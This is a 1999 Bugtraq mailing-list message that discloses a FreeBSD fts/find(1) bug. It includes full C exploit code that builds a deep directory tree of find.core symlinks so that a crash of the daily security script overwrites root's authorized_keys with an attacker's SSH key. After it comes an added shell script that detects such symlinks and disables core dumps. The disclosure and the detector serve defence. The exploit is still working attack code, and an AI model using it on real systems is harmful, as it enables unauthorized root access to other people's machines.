Bugtraq mailing list archives
Re: RE: fts_print() , find and other stuff ?
From: venglin () FREEBSD LUBLIN PL (Przemyslaw Frasunek)
Date: Wed, 25 Aug 1999 09:13:18 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- -----FW: <XFMail.990825091318.venglin () FreeBSD lublin pl>-----
Date: Wed, 25 Aug 1999 09:13:18 +0200 (CEST)
Sender: owner-freebsd-security () FreeBSD ORG
From: Przemyslaw Frasunek <venglin () FreeBSD lublin pl>
To: Rafal Banaszkiewicz <raf () tb-303 org>
Subject: RE: fts_print() , find and other stuff ?
Cc: freebsd-security () freebsd org

On 24-Aug-99 Rafal Banaszkiewicz wrote:
> One of my friends has written sploit code for this bug? It's an old bug ... and it's still not fixed.
Yes, this bug is quite easy to exploit. Find(1) runs every day from the /etc/security script. It segfaults when the directory tree is _very_ long, because of a junk pointer to the directory name. The core is created in one of the directories from our tree. But if find.core already exists, it's overwritten. It's possible to create a symlink from e.g. master.passwd or something else to find.core, and this file will be overwritten. Sample code below.

BTW, sorry for my poor English.

/*
 * (c) 1999 babcia padlina ltd. <babunia () FreeBSD lublin pl>
 *
 * bug in fts libc functions allows to overwrite any file in system,
 * when running /etc/security script (executed from 'daily' scripts).
 *
 * affected systems:
 *  - freebsd (all versions)
 *  - probably openbsd/netbsd
 *
 * fix:
 *  - limit root's coredump size
 *  - patch libc
 */

#include <stdio.h>
#include <errno.h>
#include <string.h>      /* memset */
#include <strings.h>     /* bzero */
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/* Directory name that will appear inside the core image: find(1) dumps core
 * while holding the path it was walking, so this text (with its newlines)
 * lands in the overwritten file as a line of its own. */
#define STRING  "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
#define FILE    "/root/.ssh/authorized_keys"   /* file to overwrite via the symlink */
#define CORE    "find.core"                    /* name find(1) dumps core under */
#define DEPTH   300                            /* nesting levels; makes the path long enough to crash fts */
#define BUFSIZE 250

/* Create dir, step into it and plant the symlink inside it.
 * symlink(2) takes the target first: a link named linkto pointing at linkfrom. */
static int makedir(const char *dir, const char *linkfrom, const char *linkto)
{
    if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
        return -1;
    if (chdir(dir))
        return -1;
    if (symlink(linkfrom, linkto) < 0)
        return -1;
    return 0;
}

int main(void)
{
    int i;
    char pid[16], buf[BUFSIZE];

    /* Work under a directory named after our pid so repeated runs don't collide. */
    sprintf(pid, "%d", (int)getpid());
    if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) {
        perror("mkdir()");
        return -1;
    }
    if (chdir(pid)) {
        perror("chdir()");
        return -1;
    }

    /* Padding component: 249 'A's, to grow the total path length quickly. */
    bzero(buf, BUFSIZE);
    memset(buf, 0x41, BUFSIZE - 1);

    /* Alternate the key-bearing name and the padding name DEPTH times,
     * planting find.core -> FILE at every level so whichever directory
     * find(1) is in when it crashes already holds the trap. */
    for (i = 0; i < DEPTH; i++) {
        if (makedir(STRING, FILE, CORE) < 0) {
            perror("makedir()");
            return -1;
        }
        if (makedir(buf, FILE, CORE) < 0) {
            perror("makedir()");
            return -1;
        }
    }
    return 0;
}

- --------------End of forwarded message-------------------------

- ---
* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
* Inet: venglin () FreeBSD lublin pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQA/AwUBN8OcA/6SPyHAYTvjEQLrywCfd5hMX9Cak+W1SuW7o4oA4o/RUPoAoJDC
8PVlnVtNw9p7rTmtBtTL3uC4
=P88V
-----END PGP SIGNATURE-----
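The message above describes the trap (a symlink named find.core pointing at a file root owns) and names the mitigation (a zero core-file limit for the daily run). The script below is an added example, not code from the original post or its author: it walks a tree for symlinks with a core-like name whose target is an absolute path outside that tree, and wraps find(1) with the core limit set to zero. It assumes a POSIX sh with find, readlink and mktemp; the sample tree is constructed for the demonstration and the target path /root/.ssh/authorized_keys is the one the exploit uses, it need not exist.

```shell
#!/bin/sh
# Added example (not from the original post): detect the symlink trap the
# exploit plants and run find(1) so that no core can land on it.
# Assumes POSIX sh plus find, readlink and mktemp. The sample tree below is
# constructed for the demonstration.

# Print one "TRAP <link> -> <target>" line per suspicious symlink under $1.
# Names reach the inner shell through -exec, so directory names with
# spaces or embedded newlines (exactly what the exploit creates) survive.
find_core_symlinks() {
    root=$1
    find "$root" -type l -name '*.core' -exec sh -c '
        root=$1; shift
        for l in "$@"; do
            t=$(readlink "$l")
            case "$t" in
                "$root"/*) ;;                 # points inside the tree: ignore
                /*) printf "TRAP %s -> %s\n" "$l" "$t" ;;
            esac
            # Relative targets (../../etc/foo) would need canonicalising
            # before the same test; omitted to stay within POSIX tools.
        done' _ "$root" {} +
}

# Return 0 when the tree is clean, 1 when at least one trap is present.
check_tree() {
    if find_core_symlinks "$1" | grep -q '^TRAP '; then
        return 1
    fi
    return 0
}

# The mitigation the exploit header names: run find(1) with the core-file
# limit at zero, so a crash cannot write through a planted find.core link.
run_without_core() {
    ( ulimit -c 0; find "$@" )
}

# Build a shallow version of the exploit layout: nested directories with a
# long name, each holding find.core -> /root/.ssh/authorized_keys.
# Constructed sample; ln -s does not require the target to exist.
build_sample_tree() {
    base=$(mktemp -d)
    long=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    d=$base
    for i in 1 2 3; do
        d="$d/$long"
        mkdir "$d"
        ln -s /root/.ssh/authorized_keys "$d/find.core"
    done
    printf '%s\n' "$base"
}

if [ "${1-}" = "--demo" ]; then
    tree=$(build_sample_tree)
    find_core_symlinks "$tree"
    check_tree "$tree" || echo "trap found under $tree"
    run_without_core "$tree" -name '*.core' >/dev/null
    rm -rf "$tree"
fi
```

Run it as `sh check.sh --demo` to see the three planted links reported. The check only catches absolute targets, which is what this exploit uses; a relative `../../..` chain escaping the tree needs the path canonicalised first. The `ulimit -c 0` wrapper is the cheap fix the exploit header itself suggests for the daily scripts, and is independent of whether the fts bug in libc is patched.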
Current thread:
- Re: RE: fts_print() , find and other stuff ? Przemyslaw Frasunek (Aug 25)